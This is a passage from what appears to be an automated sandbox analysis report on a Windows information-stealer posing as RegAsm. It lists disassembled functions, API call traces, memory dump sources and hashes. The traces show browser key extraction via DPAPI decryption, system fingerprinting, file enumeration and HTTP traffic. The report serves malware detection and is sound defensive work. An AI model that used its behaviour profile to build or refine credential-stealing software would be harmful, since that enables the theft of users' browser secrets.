                                                                                                        • Instruction Fuzzy Hash: 15410B76A001199BCF10FBA6DD465CD77B5AF04308F51003AFD00B3192DBB8AE4D8AE9
                                                                                                        Function 0040819F Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 77COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                          • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                          • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                          • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                          • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                          • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                          • Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37
                                                                                                        • StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,0040CC90,?,?), ref: 004081E5
                                                                                                          • Part of subcall function 00408048: CryptStringToBinaryA.CRYPT32($g@,00000000,00000001,00000000,?,00000000,00000000), ref: 00408060
                                                                                                          • Part of subcall function 00408048: LocalAlloc.KERNEL32(00000040,?,?,?,00406724,?), ref: 0040806E
                                                                                                          • Part of subcall function 00408048: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00408084
                                                                                                          • Part of subcall function 00408048: LocalFree.KERNEL32(?,?,?,00406724,?), ref: 00408093
                                                                                                          • Part of subcall function 004080A1: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0040823B), ref: 004080C4
                                                                                                          • Part of subcall function 004080A1: LocalAlloc.KERNEL32(00000040,0040823B,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080D8
                                                                                                          • Part of subcall function 004080A1: LocalFree.KERNEL32(0040CB95,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080FD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Local$Alloc$CryptFile$BinaryFreeString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                                                                                        • String ID: $"encrypted_key":"$DPAPI
                                                                                                        • API String ID: 2311102621-738592651
                                                                                                        • Opcode ID: 90210c10ee996d7ab5569050e076cca1abac48211b6b88e599488f63d6b1df73
                                                                                                        • Instruction ID: d78dfd73ee8100a23edce15a91f2c70fa2f38e8288fa49592993377d3a11e596
                                                                                                        • Opcode Fuzzy Hash: 90210c10ee996d7ab5569050e076cca1abac48211b6b88e599488f63d6b1df73
                                                                                                        • Instruction Fuzzy Hash: 1121C232E40209ABDF14EB91DD41ADE7378AF41364F2045BFE950B72D1DF38AA49CA58
                                                                                                        Function 00410F51 Relevance: 6.0, APIs: 4, Instructions: 35memoryregistryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C), ref: 00410F65
                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C,Keyboard Languages: ,00436910), ref: 00410F6C
                                                                                                        • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ), ref: 00410F8A
                                                                                                        • RegQueryValueExA.KERNEL32(00436888,00000000,00000000,00000000,000000FF,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000), ref: 00410FA6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Heap$AllocOpenProcessQueryValue
                                                                                                        • String ID:
                                                                                                        • API String ID: 3676486918-0
                                                                                                        • Opcode ID: 516f2c0c8b5e6a914cb95f881748b3b593324cf3efc2baeb97f22068c18ac649
                                                                                                        • Instruction ID: 198c8e352812e869def4411d780e2caea40c147a773264a459f6a712475eeb20
                                                                                                        • Opcode Fuzzy Hash: 516f2c0c8b5e6a914cb95f881748b3b593324cf3efc2baeb97f22068c18ac649
                                                                                                        • Instruction Fuzzy Hash: C9F03075640304FBEF148B90DC0AFAE7B7EEB44706F141094F601A51A0E7B29B509B60
                                                                                                        Function 00416330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                        • lstrcatA.KERNEL32(?,00000000,?,00000000,?), ref: 00416378
                                                                                                        • lstrcatA.KERNEL32(?), ref: 00416396
                                                                                                          • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416018
                                                                                                          • Part of subcall function 00415FD1: FindFirstFileA.KERNEL32(?,?), ref: 0041602F
                                                                                                          • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB4), ref: 00416050
                                                                                                          • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB8), ref: 0041606A
                                                                                                          • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416091
                                                                                                          • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436647), ref: 004160A5
                                                                                                          • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160C2
                                                                                                          • Part of subcall function 00415FD1: PathMatchSpecA.SHLWAPI(?,?), ref: 004160EF
                                                                                                          • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?), ref: 00416125
                                                                                                          • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD0), ref: 00416137
                                                                                                          • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 0041614A
                                                                                                          • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD4), ref: 0041615C
                                                                                                          • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 00416170
                                                                                                          • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160D9
                                                                                                          • Part of subcall function 00415FD1: FindNextFileA.KERNEL32(?,?), ref: 004162FF
                                                                                                          • Part of subcall function 00415FD1: FindClose.KERNEL32(?), ref: 00416313
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcat$wsprintf$Find$FilePath$CloseFirstFolderMatchNextSpec
                                                                                                        • String ID: nzA
                                                                                                        • API String ID: 153043497-1761861442
                                                                                                        • Opcode ID: b4da720962e9555cdd77b7fe306ab90caf7c41af40743b1f06eb89ecc5cf0673
                                                                                                        • Instruction ID: 6a45041e7e61eaec4ac0428956384e3812b0c56a5955d947ae57416d2cc1f0af
                                                                                                        • Opcode Fuzzy Hash: b4da720962e9555cdd77b7fe306ab90caf7c41af40743b1f06eb89ecc5cf0673
                                                                                                        • Instruction Fuzzy Hash: DD31F77280010DEFDF15EB60DC43EE8377AEB08314F5440AEF606932A1EA769B919F55
                                                                                                        Function 0041683E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                          • Part of subcall function 00406963: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004069C5
                                                                                                          • Part of subcall function 00406963: StrCmpCA.SHLWAPI(?), ref: 004069DF
                                                                                                          • Part of subcall function 00406963: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
                                                                                                          • Part of subcall function 00406963: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00406A4D
                                                                                                          • Part of subcall function 00406963: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406A7D
                                                                                                          • Part of subcall function 00406963: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
                                                                                                          • Part of subcall function 00406963: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406AAC
                                                                                                        • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416873
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: HttpInternet$OpenRequest$ConnectInfoOptionQuerySendlstrcpy
                                                                                                        • String ID: ERROR$ERROR
                                                                                                        • API String ID: 3086566538-2579291623
                                                                                                        • Opcode ID: 1f04a280a058e3c99f689a2c33220ef0c6b47f7de1e09031bce4c6852948f489
                                                                                                        • Instruction ID: fa6cd13a443083575c3a824eeb1e5676c961334a8f4b47820412c2fdc9a040c1
                                                                                                        • Opcode Fuzzy Hash: 1f04a280a058e3c99f689a2c33220ef0c6b47f7de1e09031bce4c6852948f489
                                                                                                        • Instruction Fuzzy Hash: 6F014F75A00118ABCB20FB76D9469CD73A96F04308F55417BBC24E3293E7B8E9494AD9
                                                                                                        Function 00416E97 Relevance: 4.6, APIs: 3, Instructions: 70sleepsynchronizationthreadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • Sleep.KERNEL32(000003E8,?,?), ref: 00416EFE
                                                                                                        • CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateObjectSingleSleepThreadWait
                                                                                                        • String ID:
                                                                                                        • API String ID: 4198075804-0
                                                                                                        • Opcode ID: a1dc13e99dd204c5a3461b4ea6d28ee21b2c0be54f1f4843eeff7d6218642cdc
                                                                                                        • Instruction ID: 5b264aedade7dddb2649676fe5ff4aca135c6ea40ecc08e40dc523016e9b5da3
                                                                                                        • Opcode Fuzzy Hash: a1dc13e99dd204c5a3461b4ea6d28ee21b2c0be54f1f4843eeff7d6218642cdc
                                                                                                        • Instruction Fuzzy Hash: EC213B72900218ABCF14EF96E9459DE7BB9FF40358F11512BF904A3151D738EA86CF98
                                                                                                        Function 00412446 Relevance: 4.5, APIs: 3, Instructions: 41fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00414A8D), ref: 00412460
                                                                                                        • WriteFile.KERNEL32(00000000,00000000,00414A8D,00414A8D,00000000,?,?,?,00414A8D), ref: 00412487
                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00414A8D), ref: 0041249E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: File$CloseCreateHandleWrite
                                                                                                        • String ID:
                                                                                                        • API String ID: 1065093856-0
                                                                                                        • Opcode ID: 618600667c8334e05266c7920bfcba6b014638909509334c775888355d968c7c
                                                                                                        • Instruction ID: a587d297adf89e60fa6946fdd7da6f666782c0f167f87b21f29bcfda1cd19bad
                                                                                                        • Opcode Fuzzy Hash: 618600667c8334e05266c7920bfcba6b014638909509334c775888355d968c7c
                                                                                                        • Instruction Fuzzy Hash: 84F02471200118BFEF01AFA4DD8AFEF379CDF053A8F000022F951D6190D3A58D9157A5
                                                                                                        Function 6C093060 Relevance: 4.5, APIs: 3, Instructions: 36timeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • ?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6C093095
                                                                                                          • Part of subcall function 6C0935A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6C11F688,00001000), ref: 6C0935D5
                                                                                                          • Part of subcall function 6C0935A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C0935E0
                                                                                                          • Part of subcall function 6C0935A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6C0935FD
                                                                                                          • Part of subcall function 6C0935A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C09363F
                                                                                                          • Part of subcall function 6C0935A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C09369F
                                                                                                          • Part of subcall function 6C0935A0: __aulldiv.LIBCMT ref: 6C0936E4
                                                                                                        • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C09309F
                                                                                                          • Part of subcall function 6C0B5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C0B56EE,?,00000001), ref: 6C0B5B85
                                                                                                          • Part of subcall function 6C0B5B50: EnterCriticalSection.KERNEL32(6C11F688,?,?,?,6C0B56EE,?,00000001), ref: 6C0B5B90
                                                                                                          • Part of subcall function 6C0B5B50: LeaveCriticalSection.KERNEL32(6C11F688,?,?,?,6C0B56EE,?,00000001), ref: 6C0B5BD8
                                                                                                          • Part of subcall function 6C0B5B50: GetTickCount64.KERNEL32 ref: 6C0B5BE4
                                                                                                        • ?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6C0930BE
                                                                                                          • Part of subcall function 6C0930F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6C093127
                                                                                                          • Part of subcall function 6C0930F0: __aulldiv.LIBCMT ref: 6C093140
                                                                                                          • Part of subcall function 6C0CAB2A: __onexit.LIBCMT ref: 6C0CAB30
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325466692.000000006C091000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C090000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325445154.000000006C090000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3325754871.000000006C10D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3325812764.000000006C11E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3325838597.000000006C122000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c090000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
                                                                                                        • String ID:
                                                                                                        • API String ID: 4291168024-0
                                                                                                        • Opcode ID: a8f61f19ce74e43f84a6c7e52d2e1dd53994cde777005441642c05047c0039e2
                                                                                                        • Instruction ID: 40735fa9ae99a28f516fe09b0088f4b4166cc5ea760e7e951287da9fa2e08dd8
                                                                                                        • Opcode Fuzzy Hash: a8f61f19ce74e43f84a6c7e52d2e1dd53994cde777005441642c05047c0039e2
                                                                                                        • Instruction Fuzzy Hash: E3F0F422E2474897CA10DF7489423EAB3B4EF6F214F101319E86C63A21FB3472D9D382
                                                                                                        Function 00410C85 Relevance: 4.5, APIs: 3, Instructions: 22memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C91
                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,00401385), ref: 00410C98
                                                                                                        • GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410CAC
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Heap$AllocComputerNameProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 4203777966-0
                                                                                                        • Opcode ID: 223c93d772ac102104f3d80f3225d4df8625dfe3dc4c13cc38eb63403da552c2
                                                                                                        • Instruction ID: 4a48e0897f6a5e53a67cc5d7e0c14adbc6ce47083a4b6c26751418be0e4428b5
                                                                                                        • Opcode Fuzzy Hash: 223c93d772ac102104f3d80f3225d4df8625dfe3dc4c13cc38eb63403da552c2
                                                                                                        • Instruction Fuzzy Hash: 2DE08CB1200204BBD7449BD9AC8DF8A76BCDB84715F100226F605D6250EAB4C9848B68
                                                                                                        Function 0040C95C Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 286COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                        • StrCmpCA.SHLWAPI(?,Opera GX,00436853,0043684B,?,?,?), ref: 0040C98F
                                                                                                          • Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                          • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                          • Part of subcall function 00411D92: GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99
                                                                                                          • Part of subcall function 0040819F: StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,0040CC90,?,?), ref: 004081E5
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
